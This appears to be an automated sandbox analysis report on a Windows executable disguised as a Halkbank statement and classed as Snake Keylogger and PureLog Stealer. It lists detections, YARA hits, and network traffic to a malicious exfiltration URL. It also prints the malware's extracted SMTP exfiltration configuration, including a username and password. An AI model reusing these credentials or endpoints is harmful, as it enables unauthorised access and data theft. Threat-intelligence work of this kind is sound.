Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Halkbank_Ekstre_20230426_075819_154055.exe

Overview

General Information

Sample name:Halkbank_Ekstre_20230426_075819_154055.exe
Analysis ID:1435266
MD5:42199f4a8e3d9fe6ce26a7d4922afec7
SHA1:4e7547a14798f7c4520fab21ea2e34989bf27bc7
SHA256:9745e0d21f50b1c553b40e8c353b11bb172a2bae1a83b3b9cfce26f9e01b3b89
Tags:exe
Infos:

Detection

PureLog Stealer, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Snake Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@eraslangroup.net", "Password": "aHZAyjDK", "Host": "mail.eraslangroup.net", "Port": "587"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2002086129.0000000006C00000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x14880:$a1: get_encryptedPassword
        • 0x14b76:$a2: get_encryptedUsername
        • 0x1468c:$a3: get_timePasswordChanged
        • 0x14787:$a4: get_passwordField
        • 0x14896:$a5: set_encryptedPassword
        • 0x15e63:$a7: get_logins
        • 0x15dc6:$a10: KeyLoggerEventArgs
        • 0x15a5f:$a11: KeyLoggerEventArgsEventHandler
        00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x18184:$x1: $%SMTPDV$
        • 0x181e8:$x2: $#TheHashHere%&
        • 0x1983b:$x3: %FTPDV$
        • 0x1992f:$x4: $%TelegramDv$
        • 0x15a5f:$x5: KeyLoggerEventArgs
        • 0x15dc6:$x5: KeyLoggerEventArgs
        • 0x1985f:$m2: Clipboard Logs ID
        • 0x19a2b:$m2: Screenshot Logs ID
        • 0x19af7:$m2: keystroke Logs ID
        • 0x19a03:$m4: \SnakeKeylogger\
        Click to see the 16 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 36 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
                  Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
                  Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@eraslangroup.net", "Password": "aHZAyjDK", "Host": "mail.eraslangroup.net", "Port": "587"}
                  Multi AV Scanner detection for domain / URL
                  Source: scratchdreams.tkVirustotal: Detection: 17%Perma Link
                  Source: http://scratchdreams.tkVirustotal: Detection: 17%Perma Link
                  Source: https://scratchdreams.tkVirustotal: Detection: 18%Perma Link
                  Source: https://scratchdreams.tk/_send_.php?TSVirustotal: Detection: 16%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeVirustotal: Detection: 55%Perma Link
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeReversingLabs: Detection: 44%
                  Machine Learning detection for sample
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeJoe Sandbox ML: detected
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49708 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49726 version: TLS 1.2
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: krUK.pdbSHA256COI source: Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Binary string: krUK.pdb source: Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 02702B39h0_2_0270257F
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 02702B39h0_2_02702509
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_0100F03B
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_0100F21B
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0100F7A1h3_2_0100F4E8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0100FBF9h3_2_0100F941
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_0100EA08
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06622658h3_2_06622240
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06620F11h3_2_06620C60
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662021Dh3_2_06620040
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06620BA7h3_2_06620040
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662F7D1h3_2_0662F528
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06622091h3_2_06621DE0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662D511h3_2_0662D268
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662D0B9h3_2_0662CE10
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662D969h3_2_0662D6C0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662E219h3_2_0662DF70
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662DDC1h3_2_0662DB18
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662E671h3_2_0662E3C8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662EF21h3_2_0662EC78
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662EAC9h3_2_0662E820
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06621371h3_2_066210C0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662F379h3_2_0662F0D0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662C809h3_2_0662C560
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 066217D1h3_2_06621520
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662C3B1h3_2_0662C108
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662CC61h3_2_0662C9B8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06621C31h3_2_06621980
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0662FC29h3_2_0662F980
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06622658h3_2_06622586
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06638D95h3_2_06638A58
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06635D11h3_2_06635A68
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 066388A9h3_2_06638600
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06636169h3_2_06635EC0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06636A19h3_2_06636770
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 066365C1h3_2_06636318
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_066337FA
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06636E71h3_2_06636BC8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 066302E9h3_2_06630040
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 066372C9h3_2_06637020
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_06633808
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06630B99h3_2_066308F0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06637BA1h3_2_066378F8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 0663774Ah3_2_066374A0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06630741h3_2_06630498
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06630FF1h3_2_06630D48
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06637FF9h3_2_06637D50
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06635891h3_2_066355E8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06631449h3_2_066311A0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 4x nop then jmp 06638451h3_2_066381A8

                  Networking

                  barindex
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
                  Source: Joe Sandbox ViewIP Address: 104.21.27.85 104.21.27.85
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49708 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: scratchdreams.tk
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeString found in binary or memory: http://tempuri.org/DataSeta.xsd)Microsoft
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.225
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.225$
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
